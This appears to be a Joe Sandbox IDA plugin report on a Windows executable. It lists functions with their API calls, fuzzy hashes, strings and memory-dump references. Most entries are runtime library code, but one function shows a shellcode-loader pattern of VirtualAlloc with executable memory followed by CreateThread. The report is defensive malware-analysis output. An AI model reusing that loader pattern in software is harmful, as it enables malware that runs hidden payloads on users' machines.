                                  • Snapshot File: hcaresult_7_2_4e0000_xq6J5KlULX6jlR3rET0T.jbxd
                                  Similarity
                                  • API ID: InfoLocale
                                  • String ID:
                                  • API String ID: 2299586839-0
                                  • Opcode ID: 5c580153b1e4e905aaa56b9c4e306be7617a5a753c2d38bcf0a7b86783ec9147
                                  • Instruction ID: 2e3024cfb0a8c74aee20d9c2b735023d868f5afbd455563b1bb72c5a29de7454
                                  • Opcode Fuzzy Hash: 5c580153b1e4e905aaa56b9c4e306be7617a5a753c2d38bcf0a7b86783ec9147
                                  • Instruction Fuzzy Hash: F7E04F36500268BBCF126F63DC05AAF3E16EF44761F008026FD1566260CB758D21EA99
                                  APIs
                                  • SetUnhandledExceptionFilter.KERNEL32(Function_00004ECE,004E453C), ref: 004E4EC7
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2180986614.00000000004E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 004E0000, based on PE: true
                                  • Associated: 00000007.00000002.2180966599.00000000004E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181010552.00000000004FD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181029964.0000000000507000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181082386.0000000000555000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_4e0000_xq6J5KlULX6jlR3rET0T.jbxd
                                  Similarity
                                  • API ID: ExceptionFilterUnhandled
                                  • String ID:
                                  • API String ID: 3192549508-0
                                  • Opcode ID: 7641affa20c76d27e11b6974c606a37ce10003dcf96a0f371f58a2a9b1f8dbd4
                                  • Instruction ID: d5e50c7785359b9741839207c2065ade165948055195899e0a846a0fe7f6b6c2
                                  • Opcode Fuzzy Hash: 7641affa20c76d27e11b6974c606a37ce10003dcf96a0f371f58a2a9b1f8dbd4
                                  • Instruction Fuzzy Hash:
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2180986614.00000000004E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 004E0000, based on PE: true
                                  • Associated: 00000007.00000002.2180966599.00000000004E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181010552.00000000004FD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181029964.0000000000507000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181082386.0000000000555000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_4e0000_xq6J5KlULX6jlR3rET0T.jbxd
                                  Similarity
                                  • API ID: HeapProcess
                                  • String ID:
                                  • API String ID: 54951025-0
                                  • Opcode ID: 18f808b5419bd7bacac3ca119623e034e8554a9b3e0ac4f61d290d51e60bb3d5
                                  • Instruction ID: 4a402e3af0d07b039de2b29a61f3e419750fc677b77660c07be185f93fd0bd55
                                  • Opcode Fuzzy Hash: 18f808b5419bd7bacac3ca119623e034e8554a9b3e0ac4f61d290d51e60bb3d5
                                  • Instruction Fuzzy Hash: FBA002B0A13301CF9B408F36AF5931D3BEABA556E6B059079A445C6170EF34C4A4FF06
                                  APIs
                                    • Part of subcall function 004E10D0: __EH_prolog3_catch.LIBCMT ref: 004E10D7
                                    • Part of subcall function 004E10D0: _strlen.LIBCMT ref: 004E10E9
                                  • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 004FC285
                                    • Part of subcall function 004E163E: _strlen.LIBCMT ref: 004E1656
                                  • _strlen.LIBCMT ref: 004FC2A0
                                  • _strlen.LIBCMT ref: 004FC2B6
                                  • GetProcAddress.KERNEL32(00000000,?), ref: 004FC2D3
                                    • Part of subcall function 004FC1F7: VirtualAlloc.KERNELBASE(00000000,000004AC,00001000,00000040,ole,00000000,?,?,004FC2E6), ref: 004FC20B
                                    • Part of subcall function 004FC1F7: CreateThread.KERNELBASE(00000000,00000000,00000188,MZx,00000000,00000000), ref: 004FC23F
                                    • Part of subcall function 004FC1F7: WaitForSingleObjectEx.KERNEL32(00000000,000000FF,00000000,?,?,004FC2E6), ref: 004FC24B
                                    • Part of subcall function 004FC1F7: CloseHandle.KERNEL32(00000000,?,?,004FC2E6), ref: 004FC252
                                    • Part of subcall function 004E1BEA: _Deallocate.LIBCONCRT ref: 004E1BF9
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2180986614.00000000004E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 004E0000, based on PE: true
                                  • Associated: 00000007.00000002.2180966599.00000000004E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181010552.00000000004FD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181029964.0000000000507000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181082386.0000000000555000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_4e0000_xq6J5KlULX6jlR3rET0T.jbxd
                                  Similarity
                                  • API ID: _strlen$Handle$AddressAllocCloseCreateDeallocateH_prolog3_catchModuleObjectProcSingleThreadVirtualWait
                                  • String ID: Cons$Free$Madino Mino$kernel32.dll$ole
                                  • API String ID: 4115190924-2348686229
                                  • Opcode ID: 6d943ea69e72508cb10a5fe76091d55f0042c64fd71659cea4adcccca635f8c0
                                  • Instruction ID: 00fbd9e9f5ded55236f4e75f75143d0443492c60797e8fd74ddc61aacc3f5fac
                                  • Opcode Fuzzy Hash: 6d943ea69e72508cb10a5fe76091d55f0042c64fd71659cea4adcccca635f8c0
                                  • Instruction Fuzzy Hash: D301C831D40208AF8B14EBA6DC568FE73B9EF44705B20401FF901A2195EF3C6906D66D
                                  APIs
                                  • __EH_prolog3.LIBCMT ref: 004E20FA
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 004E2104
                                  • int.LIBCPMT ref: 004E211B
                                    • Part of subcall function 004E2653: std::_Lockit::_Lockit.LIBCPMT ref: 004E2664
                                    • Part of subcall function 004E2653: std::_Lockit::~_Lockit.LIBCPMT ref: 004E267E
                                  • codecvt.LIBCPMT ref: 004E213E
                                  • std::_Facet_Register.LIBCPMT ref: 004E2155
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 004E2175
                                  • Concurrency::cancel_current_task.LIBCPMT ref: 004E2182
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2180986614.00000000004E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 004E0000, based on PE: true
                                  • Associated: 00000007.00000002.2180966599.00000000004E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181010552.00000000004FD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181029964.0000000000507000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181082386.0000000000555000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_4e0000_xq6J5KlULX6jlR3rET0T.jbxd
                                  Similarity
                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercodecvt
                                  • String ID: @>U
                                  • API String ID: 2133458128-3575638740
                                  • Opcode ID: 0359fa2ea2317bcf4a3d65f2edea21af0b32306a9f0d6dceadaa68fe987c9491
                                  • Instruction ID: 6746443ffee43d93abaf00a5efae3750757ca8a4ca12de988bb1deb4a0a0b3ae
                                  • Opcode Fuzzy Hash: 0359fa2ea2317bcf4a3d65f2edea21af0b32306a9f0d6dceadaa68fe987c9491
                                  • Instruction Fuzzy Hash: CF0104319002958BCB02EF63C9166BEB7AABF9071BF10040EF40067292CFF89F018789
                                  APIs
                                  • __EH_prolog3.LIBCMT ref: 004E218F
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 004E2199
                                  • int.LIBCPMT ref: 004E21B0
                                    • Part of subcall function 004E2653: std::_Lockit::_Lockit.LIBCPMT ref: 004E2664
                                    • Part of subcall function 004E2653: std::_Lockit::~_Lockit.LIBCPMT ref: 004E267E
                                  • ctype.LIBCPMT ref: 004E21D3
                                  • std::_Facet_Register.LIBCPMT ref: 004E21EA
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 004E220A
                                  • Concurrency::cancel_current_task.LIBCPMT ref: 004E2217
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2180986614.00000000004E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 004E0000, based on PE: true
                                  • Associated: 00000007.00000002.2180966599.00000000004E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181010552.00000000004FD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181029964.0000000000507000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181082386.0000000000555000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_4e0000_xq6J5KlULX6jlR3rET0T.jbxd
                                  Similarity
                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registerctype
                                  • String ID: 8?U
                                  • API String ID: 2958136301-2531713661
                                  • Opcode ID: 861e2b54b8e8e38edf3c595ef14644062723b856b9a9cda94f28ac584fd96369
                                  • Instruction ID: 25d2d7c5f1c6f989f5522aacccd5d0e2cb5f4d24dd802bd8cec101e046258eb7
                                  • Opcode Fuzzy Hash: 861e2b54b8e8e38edf3c595ef14644062723b856b9a9cda94f28ac584fd96369
                                  • Instruction Fuzzy Hash: 1B0104719002959BCB05EF63C916ABE77B9AF80716F14044FE41467292CFBC9E01CB99
                                  APIs
                                  • type_info::operator==.LIBVCRUNTIME ref: 004E7D07
                                  • ___TypeMatch.LIBVCRUNTIME ref: 004E7E15
                                  • _UnwindNestedFrames.LIBCMT ref: 004E7F67
                                  • CallUnexpected.LIBVCRUNTIME ref: 004E7F82
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2180986614.00000000004E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 004E0000, based on PE: true
                                  • Associated: 00000007.00000002.2180966599.00000000004E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181010552.00000000004FD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181029964.0000000000507000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181082386.0000000000555000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_4e0000_xq6J5KlULX6jlR3rET0T.jbxd
                                  Similarity
                                  • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                  • String ID: csm$csm$csm
                                  • API String ID: 2751267872-393685449
                                  • Opcode ID: 4a8f8446b35b6992b382d16b788a4c5adfc1a26eb7b49dc0597ead81135f02d9
                                  • Instruction ID: 58728b5bcb4be19f718b77b4e933acbc2002baa518fb2b89113c107cc89c5713
                                  • Opcode Fuzzy Hash: 4a8f8446b35b6992b382d16b788a4c5adfc1a26eb7b49dc0597ead81135f02d9
                                  • Instruction Fuzzy Hash: A9B18D31C04289AFCF14DFA6C8819AEBBB5BF14326F14459BE8056B302D738DA51CB99
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2180986614.00000000004E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 004E0000, based on PE: true
                                  • Associated: 00000007.00000002.2180966599.00000000004E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181010552.00000000004FD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181029964.0000000000507000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181082386.0000000000555000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_4e0000_xq6J5KlULX6jlR3rET0T.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID: 0-3907804496
                                  • Opcode ID: 5af1250c676d2b44cf6c32d761d3c95ad064f4810daa73284a345cf439f376c0
                                  • Instruction ID: f8f5b68912b3288fe74cdca78ca83d29748ab86f33b84f0207f90ba3be2741bb
                                  • Opcode Fuzzy Hash: 5af1250c676d2b44cf6c32d761d3c95ad064f4810daa73284a345cf439f376c0
                                  • Instruction Fuzzy Hash: 0AB11574A0028DDFDB05DF9AC890BBEBBB1AF45304F14415AE604973A2C7799941CFA9
                                  APIs
                                  • GetCPInfo.KERNEL32(00C80758,00C80758,?,7FFFFFFF,?,004F9B89,00C80758,00C80758,?,00C80758,?,?,?,?,00C80758,?), ref: 004F995F
                                  • __alloca_probe_16.LIBCMT ref: 004F9A1A
                                  • __alloca_probe_16.LIBCMT ref: 004F9AA9
                                  • __freea.LIBCMT ref: 004F9AF4
                                  • __freea.LIBCMT ref: 004F9AFA
                                  • __freea.LIBCMT ref: 004F9B30
                                  • __freea.LIBCMT ref: 004F9B36
                                  • __freea.LIBCMT ref: 004F9B46
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2180986614.00000000004E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 004E0000, based on PE: true
                                  • Associated: 00000007.00000002.2180966599.00000000004E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181010552.00000000004FD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181029964.0000000000507000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181082386.0000000000555000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_4e0000_xq6J5KlULX6jlR3rET0T.jbxd
                                  Similarity
                                  • API ID: __freea$__alloca_probe_16$Info
                                  • String ID:
                                  • API String ID: 127012223-0
                                  • Opcode ID: a64fe09f2dfc051ecaf30fac5fad59e8b1ae438b4fd4c8c6f46d536178ce68c9
                                  • Instruction ID: 756841415eec0d5058485422d34051a238782dcf96fc8e8cc7d7611eb65d9246
                                  • Opcode Fuzzy Hash: a64fe09f2dfc051ecaf30fac5fad59e8b1ae438b4fd4c8c6f46d536178ce68c9
                                  • Instruction Fuzzy Hash: 7D71E3B290024DABDF209E559C82FBF77A9AF85314F19005FEB04A7381D67DAD00C769
                                  APIs
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 004E42E3
                                  • __alloca_probe_16.LIBCMT ref: 004E430F
                                  • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 004E434E
                                  • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004E436B
                                  • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 004E43AA
                                  • __alloca_probe_16.LIBCMT ref: 004E43C7
                                  • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004E4409
                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 004E442C
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2180986614.00000000004E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 004E0000, based on PE: true
                                  • Associated: 00000007.00000002.2180966599.00000000004E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181010552.00000000004FD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181029964.0000000000507000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181082386.0000000000555000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_4e0000_xq6J5KlULX6jlR3rET0T.jbxd
                                  Similarity
                                  • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                  • String ID:
                                  • API String ID: 2040435927-0
                                  • Opcode ID: fba72fc941c3667ec2b04123ecab45f70d3c8b1d1c2a3e4090c39ffd26134259
                                  • Instruction ID: f5f22d3b2ac273843c74405ada194099c60da439b39704e72a1f04b4030edb1e
                                  • Opcode Fuzzy Hash: fba72fc941c3667ec2b04123ecab45f70d3c8b1d1c2a3e4090c39ffd26134259
                                  • Instruction Fuzzy Hash: 8F51D272A00286AFDB204F56CC44FBF3BB9EF84756F15412AFD05A6290D7389C11CB58
                                  APIs
                                  • _ValidateLocalCookies.LIBCMT ref: 004E76B7
                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 004E76BF
                                  • _ValidateLocalCookies.LIBCMT ref: 004E7748
                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 004E7773
                                  • _ValidateLocalCookies.LIBCMT ref: 004E77C8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2180986614.00000000004E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 004E0000, based on PE: true
                                  • Associated: 00000007.00000002.2180966599.00000000004E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181010552.00000000004FD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181029964.0000000000507000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181082386.0000000000555000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_4e0000_xq6J5KlULX6jlR3rET0T.jbxd
                                  Similarity
                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                  • String ID: csm
                                  • API String ID: 1170836740-1018135373
                                  • Opcode ID: c4b39095a846d377fef6d951ca1cec72f9fcd1c1444bd6eb6d76d9fb20812b7d
                                  • Instruction ID: 4800dcb07d73f846b6d6b6c4fb28c8f3f6d32bfa86cca182d78ba062165b09a4
                                  • Opcode Fuzzy Hash: c4b39095a846d377fef6d951ca1cec72f9fcd1c1444bd6eb6d76d9fb20812b7d
                                  • Instruction Fuzzy Hash: C441D634A042489FCF00DF6BC880A9E7BB1BF45329F14809AE8189B352D739AD15CB99
                                  APIs
                                  • GetLastError.KERNEL32(?,?,004E7871,004E5E40,004E4F12), ref: 004E7888
                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 004E7896
                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 004E78AF
                                  • SetLastError.KERNEL32(00000000,004E7871,004E5E40,004E4F12), ref: 004E7901
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2180986614.00000000004E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 004E0000, based on PE: true
                                  • Associated: 00000007.00000002.2180966599.00000000004E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181010552.00000000004FD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181029964.0000000000507000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181082386.0000000000555000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_4e0000_xq6J5KlULX6jlR3rET0T.jbxd
                                  Similarity
                                  • API ID: ErrorLastValue___vcrt_
                                  • String ID:
                                  • API String ID: 3852720340-0
                                  • Opcode ID: 507e8bc12de7241a553b8e5e00a10f766b96d03329c3661417ccaef94470548f
                                  • Instruction ID: baad0478f9c2ef9fcc655336c6e7cd49ce562aa1c5d50eff1ccf956303822269
                                  • Opcode Fuzzy Hash: 507e8bc12de7241a553b8e5e00a10f766b96d03329c3661417ccaef94470548f
                                  • Instruction Fuzzy Hash: E101F53220C7555EAA142777BC9A52F2655FF2237BB30033FF424412E1EF194C16A24C
                                  APIs
                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,F4A61D19,?,?,00000000,004FB0F9,000000FF,?,004EC0CF,?,?,004EC0A3,00000000), ref: 004EC174
                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 004EC186
                                  • FreeLibrary.KERNEL32(00000000,?,00000000,004FB0F9,000000FF,?,004EC0CF,?,?,004EC0A3,00000000), ref: 004EC1A8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2180986614.00000000004E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 004E0000, based on PE: true
                                  • Associated: 00000007.00000002.2180966599.00000000004E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181010552.00000000004FD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181029964.0000000000507000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181082386.0000000000555000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_4e0000_xq6J5KlULX6jlR3rET0T.jbxd
                                  Similarity
                                  • API ID: AddressFreeHandleLibraryModuleProc
                                  • String ID: CorExitProcess$mscoree.dll
                                  • API String ID: 4061214504-1276376045
                                  • Opcode ID: 90474d36727801713bc4ec47e2ae1718a43e62fea5eb71335a8d4c1abd78a73a
                                  • Instruction ID: c158811130faf17fdc41c8d25402b44d7eb1e3d9fbf6b55792468aebc6aa646a
                                  • Opcode Fuzzy Hash: 90474d36727801713bc4ec47e2ae1718a43e62fea5eb71335a8d4c1abd78a73a
                                  • Instruction Fuzzy Hash: 6C01A231944699AFDB118F51DC45FBFBBB9FF04B15F000136E811E22A4DB789801CA98
                                  APIs
                                  • __EH_prolog3.LIBCMT ref: 004E3BD6
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 004E3BE1
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 004E3C4F
                                    • Part of subcall function 004E3D32: std::locale::_Locimp::_Locimp.LIBCPMT ref: 004E3D4A
                                  • std::locale::_Setgloballocale.LIBCPMT ref: 004E3BFC
                                  • _Yarn.LIBCPMT ref: 004E3C12
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2180986614.00000000004E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 004E0000, based on PE: true
                                  • Associated: 00000007.00000002.2180966599.00000000004E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181010552.00000000004FD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181029964.0000000000507000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181082386.0000000000555000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_4e0000_xq6J5KlULX6jlR3rET0T.jbxd
                                  Similarity
                                  • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                  • String ID:
                                  • API String ID: 1088826258-0
                                  • Opcode ID: 5393334074cb18d81b7110cf03cd23bc638d1dc18bc4ad03d49a68ecf6887304
                                  • Instruction ID: e7bcc774ee37cf54aaf6409ea5143736626d4b054f0ac866b12c9f15b2053da9
                                  • Opcode Fuzzy Hash: 5393334074cb18d81b7110cf03cd23bc638d1dc18bc4ad03d49a68ecf6887304
                                  • Instruction Fuzzy Hash: 30018871A002909BC706AF22D85993D7B72BF85746B14004EE80257392CB3CAB02DA8D
                                  APIs
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004F0BA6
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004F0BB9
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2180986614.00000000004E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 004E0000, based on PE: true
                                  • Associated: 00000007.00000002.2180966599.00000000004E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181010552.00000000004FD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181029964.0000000000507000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181082386.0000000000555000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_4e0000_xq6J5KlULX6jlR3rET0T.jbxd
                                  Similarity
                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                  • String ID: O$O
                                  • API String ID: 885266447-1025494177
                                  • Opcode ID: 590f6f82cdf1b63d470e6ba81f5f586fa95c9ab180396cc642801064ebc6650f
                                  • Instruction ID: 43f23910f05d850c1b60cb471cae1bf840b13ac93322b1a783c6bbaf7df855ac
                                  • Opcode Fuzzy Hash: 590f6f82cdf1b63d470e6ba81f5f586fa95c9ab180396cc642801064ebc6650f
                                  • Instruction Fuzzy Hash: 0F518271E0024DAFCF14CF98C891EBEBBB2EB89314F14805AEA5597352D334AE41CB54
                                  APIs
                                  • __EH_prolog3.LIBCMT ref: 004E2398
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 004E23A5
                                  • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 004E23E2
                                    • Part of subcall function 004E3CCD: _Yarn.LIBCPMT ref: 004E3CEC
                                    • Part of subcall function 004E3CCD: _Yarn.LIBCPMT ref: 004E3D10
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2180986614.00000000004E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 004E0000, based on PE: true
                                  • Associated: 00000007.00000002.2180966599.00000000004E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181010552.00000000004FD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181029964.0000000000507000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181082386.0000000000555000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_4e0000_xq6J5KlULX6jlR3rET0T.jbxd
                                  Similarity
                                  • API ID: Yarnstd::_$H_prolog3Locinfo::_Locinfo_ctorLockitLockit::_
                                  • String ID: bad locale name
                                  • API String ID: 482894088-1405518554
                                  • Opcode ID: 516884d7eb9b3ddb2764e786b7068f8b54e4665bea25c96ec4c9934b18b13d88
                                  • Instruction ID: 8ce3cc43709beb8ce5cbcefab06e0bab20a345be35d1c1939f5b78aff30f3ff3
                                  • Opcode Fuzzy Hash: 516884d7eb9b3ddb2764e786b7068f8b54e4665bea25c96ec4c9934b18b13d88
                                  • Instruction Fuzzy Hash: 9F01ADB14007849EC7209F6B844044BFFE4BF29311750892FE18987B02C778A600CB9D
                                  APIs
                                  • LoadLibraryExW.KERNEL32(00504FF0,00000000,00000800,?,004E8973,00000000,?,00000000,?,?,?,004E8A9D,00000002,FlsGetValue,004FEC68,FlsGetValue), ref: 004E89CF
                                  • GetLastError.KERNEL32(?,004E8973,00000000,?,00000000,?,?,?,004E8A9D,00000002,FlsGetValue,004FEC68,FlsGetValue,00000000,?,004E792D), ref: 004E89D9
                                  • LoadLibraryExW.KERNEL32(00504FF0,00000000,00000000,?,00504FF0,?,?,?,004E16D9,?,004E16D9,?), ref: 004E8A01
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2180986614.00000000004E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 004E0000, based on PE: true
                                  • Associated: 00000007.00000002.2180966599.00000000004E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181010552.00000000004FD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181029964.0000000000507000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181082386.0000000000555000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_4e0000_xq6J5KlULX6jlR3rET0T.jbxd
                                  Similarity
                                  • API ID: LibraryLoad$ErrorLast
                                  • String ID: api-ms-
                                  • API String ID: 3177248105-2084034818
                                  • Opcode ID: 54d35c998149cd73943cad78a605be36db31bf23a1b6e0c319d9f0c9c6769b3d
                                  • Instruction ID: 03fd85a506bbb946f43a3231fc3a1a7b9ec62ccdd3985f7d736f305c3c2ae208
                                  • Opcode Fuzzy Hash: 54d35c998149cd73943cad78a605be36db31bf23a1b6e0c319d9f0c9c6769b3d
                                  • Instruction Fuzzy Hash: 2AE0B834640288BFEF202B62DD06B693E569F10B55F544036FA0CE81E1EF65D961D58D
                                  APIs
                                  • GetConsoleOutputCP.KERNEL32(F4A61D19,00000000,00000000,00000000), ref: 004EFBF1
                                    • Part of subcall function 004F3BF4: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,004F2B86,?,00000000,-00000008), ref: 004F3CA0
                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 004EFE4C
